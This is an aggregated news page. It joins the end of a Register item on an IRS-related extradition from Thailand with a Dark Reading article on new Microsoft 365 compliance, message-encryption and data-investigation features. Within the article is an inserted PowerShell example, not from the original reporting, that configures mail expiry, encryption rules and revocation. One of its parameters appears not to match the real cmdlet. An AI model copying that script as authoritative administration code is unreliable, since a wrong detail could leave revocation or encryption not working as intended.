According to prosecutors, Bogdanov set up an elaborate structure and lived outside the US in an effort to stay out of the IRS’ reach. But he was tracked down to Thailand, and the FBI worked with the Royal Thai Police to nab him and extradite him to the States. If convicted, he faces up to 27 years in the slammer. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/30/russian_irs_charge/

Microsoft 365 Updated with New Compliance, Encryption, Privacy Controls

New tools, such as Compliance Manager and Advanced Message Encryption, aim to give businesses more options for data privacy.

Microsoft is rolling out a series of new capabilities designed to give businesses greater control over their data privacy practices, help meet compliance requirements, and investigate potential security threats.

The changes arrive as companies take a closer look at their privacy practices and try to monitor information wherever it travels and resides. With more data moving to the cloud and consumers becoming more aware of organizations' privacy standards, protecting that data has become a priority.

One of the new capabilities is Office 365 Advanced Message Encryption, which gives admins additional controls to automatically expire, or revoke access to, encrypted emails sent outside the company and read via a secure Web portal. For example, if a message contains data such as health IDs, an admin can configure the settings so it's encrypted and expires after 30 days, or whatever the applicable compliance requirements dictate. The expiry and revocation apply to the portal copy; they do not reach back into a recipient's mailbox once a message has been delivered elsewhere.
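As an added example, not taken from the article or from Microsoft's announcement, here is how that 30-day expiry policy is expressed in Exchange Online PowerShell, together with the mail flow rule that applies it on the way out and the on-demand revocation of a single message. The tenant name, policy name, classification and Message-ID below are assumptions; the cmdlet and parameter names come from the Exchange Online module and should be checked against current documentation before use.

```powershell
# Added example (not the article's or Microsoft's own script): expire external
# encrypted mail after 30 days, encrypt outbound mail that matches a sensitive
# information type, and revoke one message. Requires the Exchange Online
# PowerShell module and an admin with Advanced Message Encryption licensing.
# "contoso", "Expiring-30d" and the Message-ID are placeholders (assumptions).

Connect-ExchangeOnline -UserPrincipalName admin@contoso.onmicrosoft.com

# 1. A custom OME configuration whose portal links stop working after 30 days.
#    Expiry only affects recipients who read through the encrypted-mail portal
#    (external recipients), which is the case the article describes.
New-OMEConfiguration -Identity "Expiring-30d" -ExternalMailExpiryInDays 30

# 2. A mail flow rule that encrypts outbound mail containing a sensitive
#    information type and applies the expiring configuration. SSN is used as a
#    documented built-in classification; substitute the health-ID type your
#    tenant defines (that name is tenant-specific, so it is not assumed here).
New-TransportRule -Name "Encrypt and expire outbound health data" `
    -SentToScope NotInOrganization `
    -MessageContainsDataClassifications @(@{Name = "U.S. Social Security Number (SSN)"}) `
    -ApplyRightsProtectionTemplate "Encrypt" `
    -ApplyRightsProtectionCustomizationTemplate "Expiring-30d"

# 3. Revoke one already-sent message before it expires. Take the Message-ID
#    from a message trace or the sender's copy; the value below is a placeholder.
$msgId = "<00000000-0000-0000-0000-000000000000@contoso.onmicrosoft.com>"
Get-OMEMessageStatus -MessageId $msgId
Set-OMEMessageRevocation -MessageId $msgId -RevokeOMEMessage $true

# 4. Confirm what is in force.
Get-OMEConfiguration -Identity "Expiring-30d" | Format-List
Get-TransportRule -Identity "Encrypt and expire outbound health data" | Format-List Name, State, ApplyRightsProtectionTemplate
```

Two caveats a practitioner will want: the rule fires on classification matches in the message body and attachments, so test it against real sample documents rather than a one-line subject; and revocation is per message, so an admin doing breach cleanup still needs the Message-IDs, which is where the data investigation search the article goes on to describe comes in.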

Microsoft is also adding data investigation capabilities, which businesses can use to analyze incidents such as data leaks or phishing attacks. Data investigation lets admins search affected content or individuals following a breach, then delete emails containing confidential data so users can’t view it. Data investigation is currently in preview, Microsoft notes in a blog post on today’s announcements.

Changes to Microsoft Teams aim to improve security and compliance for chats, meetings, and calls. These include data loss prevention and information barriers, the latter preventing specified groups of users from communicating with each other so that sensitive data does not leak between them.

There also are new features for Compliance Manager, a tool designed to help admins manage compliance across various data assets. Admins can now create their own assessments against any regulation or standard while including on-prem and non-Microsoft applications. This lets managers handle data protection controls, prep for audits, and work with different teams from Compliance Manager.

Compliance Manager integrates with the Secure Score API to detect settings and update controls accordingly. When security controls like multifactor authentication are implemented, the tool’s risk assessments reflect it. Compliance Manager updates are in public preview for commercial plans.

In another compliance-friendly move, Microsoft is extending Multi-Geo capabilities to SharePoint Online and Groups in addition to Exchange Online and OneDrive. Businesses face several compliance requirements as data residency rules are introduced around the world. Multi-Geo, which can be bought as an add-on to Microsoft 365 and Office 365, lets them choose where Office 365 content is stored at rest.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/cloud/microsoft-365-updated-with-new-compliance-encryption-privacy-controls/d/d-id/1334573?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple